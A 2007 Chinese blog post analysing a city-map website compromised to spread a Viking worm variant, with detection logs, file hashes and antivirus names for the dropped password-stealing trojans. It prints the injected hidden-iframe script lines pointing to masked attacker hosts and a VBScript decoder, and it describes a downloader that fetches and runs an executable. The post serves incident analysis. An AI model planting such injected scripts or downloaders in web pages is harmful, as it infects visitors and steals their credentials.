2007年3月6日星期二

某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii

endurer 原创2007-03-05 第1版
打开该城市地图网站的网页,瑞星警告发现:Hack.Exploit.Vml.g。
检查网页,发现网页所引用的 images/ad.js 包含代码:/---document.writeln("<iframe src=\"hxxp:\/\/m***m**.k****is*163.com\/index.html?id=5 \" width=0 height=0><\/iframe>");---/
hxxp://m***m**.k****is*163.com/index.html?id=5 包含代码:/---<iframe src="hxxp://web***.7***72*7***6.com/*0****.htm" width="0" height="0" frameborder="0"></iframe>---/
hxxp://web***.7***72*7***6.com/*0****.htm 的标题为http NO FOUND,内容为VBScript脚本代码,功能是调用自定义函数:/----function rechange(k)s=Split(k,",")t=""For i = 0 To UBound(s)t=t+Chr(eval(s(i)))Nextrechange=tEnd Function----/对变量t的值进行解密并调用execute()执行。
解密后的代码是VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 0.exe,保存为 %temp%/svchost.exe和%temp%/svchost.vbs,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
文件说明符 : D:\test\0.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:33:14修改时间 : 2007-3-5 12:33:14访问时间 : 2007-3-5 12:34:20大小 : 93240 字节 91.56 KBMD5 : ef70c5791d050cc898319acbb044e847
Kaspersky 报为 Worm.Win32.Viking.ii
0.exe运行后会下载其它恶意文件并感染EXE文件。
下面是0.exe运行后Kaspersky 6的记录:/----已检测到: 风险软件 Trojan.generic 运行进程: D:\test\0.exe已检测到: 木马程序 Trojan-PSW.Win32.Magania.jm 文件: C:\WINNT\system32\wincab.sys已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\WINNT\SMSS.EXE已检测到: 风险软件 Invader 运行进程: C:\WINNT\SVCHOST.EXE已检测到: 风险软件 Invader (loader) 运行进程: C:\WINNT\explorer.exe已检测到: 木马程序 Backdoor.Win32.Agent.alh 文件: C:\WINNT\system32\systemt.exe/UPack已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.gs 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\smsss[1].exe已检测到: 木马程序 Trojan.Win32.Agent.abf 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\276BATUZ\lsasss[1].exe/PE_Patch/UPack已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\CX67WL2N\avg[1].exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\WINNT\CSRSS.exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\MUT33WP4\datsc[1].exe已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:\WINNT\10Sy.exe已检测到: 木马程序 Trojan-PSW.Win32.WOW.ec 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\O56R812F\adobesvc[1].exe已检测到: 木马程序 Trojan-PSW.Win32.OnLineGames.es 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\E1ITG5SV\svchots[1].exe已检测到: 木马程序 Trojan-Downloader.Win32.Small.czl 文件: C:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\mstcs[1].exe----/
值得注意的是,病毒会搜索标题为AVP.AlertDialog的 Kaspersky 的警告窗口,模拟点击按钮“允许”和“跳过”向 Kaspersky 的通知窗口(类名为:AVP.Product_Notification)发送WM_CLOSE消息结束该窗口。
所以用户无法进行操作。
用pe_xscan扫描,发现可疑项:/---pe_xscan by Purple Endurer2007-3-5 12:44:24Windows 2000 Service Pack 4(5.0.2195)管理员用户组
[System Process] * 0 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\Explorer.EXE * 928 2003-6-20 3:5:4 Microsoft(R) Windows (R) 2000 Operating System 5.00.3700.6690 Windows Explorer Copyright (C) Microsoft Corp. 1981-1999 5.00.3700.6690 Microsoft Corporation ? explorer EXPLORER.EXE C:\WINNT\RichDll.dll 2007-3-5 12:37:41 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\internat.exe * 1176 2000-1-10 20:0:0 Microsoft(R) Windows (R) 2000 Operating System 5.00.2920.0000 Keyboard Language Indicator Applet Copyright (C) Microsoft Corp. 1994-1999 5.00.2920.0000 Microsoft Corporation ? INTERNAT INTERNAT.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\Tencent\qq\QQ.exe * 516 2006-3-2 8:52:30 TENCENT QQ 0, 0, 0, 0 QQ Copyright ? 2005 0, 0, 0, 0 TENCENT COMQQD QQ.exe C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\Maxthon\Maxthon.exe * 904 2007-2-11 17:46:2 Maxthon Application 1, 5, 9, 80 Maxthon Web Browser Copyright (C) 2002 1, 5, 9, 80 Maxthon International Ltd. Maxthon Maxthon Maxthon.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\Program Files\EditPlus 2\editplus.exe * 588 2005-12-12 9:32:12 EditPlus 2, 2, 1, 330 EditPlus Copyright ? 1998-2005 ES-Computing 2, 2, 1, 330 ES-Computing EditPlus EditPlus EDITPLUS.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\notepad.exe * 508 2000-1-10 20:0:0 Microsoft(R) Windows (R) 2000 Operating System 5.00.2140.1 记事本 Copyright (C) Microsoft Corp. 1981-1999 5.00.2140.1 Microsoft Corporation ? Notepad NOTEPAD.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47C:\WINNT\system32\conime.exe * 1476 2003-6-20 3:5:4 Microsoft(R) Windows (R) 2000 Operating System 5.00.2195.6655 Console IME Copyright (C) Microsoft Corp. 1981-1999 5.00.2195.6655 Microsoft Corporation ? Console CONIME.EXE C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47D:\pe\tools\3.exe * 1508 2007-3-5 12:43:37 C:\WINNT\system32\wsttrs.dll 2007-3-5 12:37:47
O4 - HKLM\..\Run: [wsttrs] C:\WINNT\SVCHOST.EXE
O23 - 服务: shiji (shiji) - C:\WINNT\system32\wincab.sys(手动启动)---/
文件说明符 : C:\WINNT\system32\wsttrs.dll属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:47修改时间 : 2007-3-5 12:37:47访问时间 : 2007-3-5 13:35:18大小 : 23539 字节 22.1011 KBMD5 : 6e25ea101a59463623725d6073058dc1
Kaspersky 报为: Trojan-PSW.Win32.Magania.jm.1
瑞星 报为:Trojan.PSW.WLOnline.jcv
文件说明符 : C:\WINNT\RichDll.dll属性 : ----获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:41修改时间 : 2007-3-5 12:37:41访问时间 : 2007-3-5 13:38:25大小 : 29721 字节 29.25 KBMD5 : a936b1dba52bbbc79cf23f9d965d2646
Kaspersky 报为: Worm.Win32.Viking.ii
文件说明符 : C:\WINNT\SVCHOST.EXE属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:46修改时间 : 2007-3-5 12:37:46访问时间 : 2007-3-5 13:39:4大小 : 69859 字节 68.227 KBMD5 : 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky 报为:Trojan-PSW.Win32.Magania.jm.1瑞星报为:Trojan.PSW.Roc.ad
文件说明符 : c:\WINNT\10Sy.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:15修改时间 : 2007-3-5 13:47:44访问时间 : 2007-3-5 13:49:17大小 : 25072 字节 24.496 KBMD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky 报为:Trojan-Downloader.Win32.Small.czl瑞星 报为:Trojan.PSW.LMir.mdw
文件说明符 : C:\WINNT\system32\systemt.exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:56修改时间 : 2007-3-5 12:59:27访问时间 : 2007-3-5 13:0:32大小 : 26130 字节 25.530 KBMD5 : 8ae1afdb6a25569a5d55a4eb5389121c
Kaspersky报为: Backdoor.Win32.Agent.alh
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temp\q9xtwt5.dll属性 : ASH-获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:46修改时间 : 2007-3-5 12:37:46访问时间 : 2007-3-5 11:6:31大小 : 32483 字节 31.739 KBMD5 : b19d0273f347ed7e3dc4fb95a70f48a4
Kaspersky报为:Trojan-PSW.Win32.Magania.jm.1瑞星报为:RootKit.Vanti.vr
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\web[1].DLL属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:59:1修改时间 : 2007-3-5 12:59:1访问时间 : 2007-3-5 13:27:43大小 : 17227 字节 16.843 KBMD5 : c68f384f846fc5943e8470ff37d9111d
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\ATKZUDI5\smsss[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:57修改时间 : 2007-3-5 12:37:59访问时间 : 2007-3-5 13:25:55大小 : 13824 字节 13.512 KBMD5 : 3f864049a2fde64042a82565d4ff92af
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.gs瑞星报为:Trojan.PSW.ZhengTu.anc
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\276BATUZ\lsasss[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:0修改时间 : 2007-3-5 12:38:1访问时间 : 2007-3-5 13:23:29大小 : 40968 字节 40.8 KBMD5 : 23f203134804fa6f2d31667267595dc5
Kaspersky 报为:Trojan.Win32.Agent.abf瑞星报为::Trojan.Agent.fii
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\CX67WL2N\avg[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:43修改时间 : 2007-3-5 12:38:6访问时间 : 2007-3-5 13:21:48大小 : 13824 字节 13.512 KBMD5 : 3cec40cb6a2ba1e57c91a083c10b09e4
此文件会复制为:c:\WINNT\SMSS.EXE
Kaspersky 报为:Trojan-PSW.Win32.OnLineGames.es瑞星 报为:Trojan.PSW.OnlineGames.in
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\MUT33WP4\datsc[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:10修改时间 : 2007-3-5 12:38:10访问时间 : 2007-3-5 13:17:19大小 : 13824 字节 13.512 KBMD5 : a9b8b545f24b36e52fd0176db42becdd
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es瑞星报为::Trojan.PSW.Agent.jdm
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\O56R812F\adobesvc[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:25修改时间 : 2007-3-5 13:38:28访问时间 : 2007-3-5 13:15:18大小 : 226868 字节 221.564 KBMD5 : 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky报为:Trojan-PSW.Win32.WOW.ec
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\E1ITG5SV\svchots[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:6修改时间 : 2007-3-5 12:38:32访问时间 : 2007-3-5 13:13:13大小 : 14848 字节 14.512 KBMD5 : a4742619bf2f16aed92fdc8623ad0623
此文件被复制为:c:\WINNT\CSRSS.exe
Kaspersky报为:Trojan-PSW.Win32.OnLineGames.es
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\inetinf[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:37:49修改时间 : 2007-3-5 12:37:55访问时间 : 2007-3-5 13:11:9大小 : 279652 字节 273.100 KBMD5 : 10a390602afad9926028116607ac094a
此文件被复制为c:\WINNT\SERVICES.EXE
Kaspersky 报为:Backdoor.Win32.Agent.alh
文件说明符 : c:\Documents and Settings\pe\Local Settings\Temporary Internet Files\Content.IE5\9ULFUMAW\mstcs[1].exe属性 : A---获取文件版本信息大小失败!创建时间 : 2007-3-5 12:38:14修改时间 : 2007-3-5 13:9:58访问时间 : 2007-3-5 13:10:36大小 : 25072 字节 24.496 KBMD5 : 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky报为:Trojan-Downloader.Win32.Small.czl瑞星报为:Trojan.PSW.LMir.mdw
发帖者 时间:
标签:

没有评论:

发表评论

订阅: 博文评论 (Atom)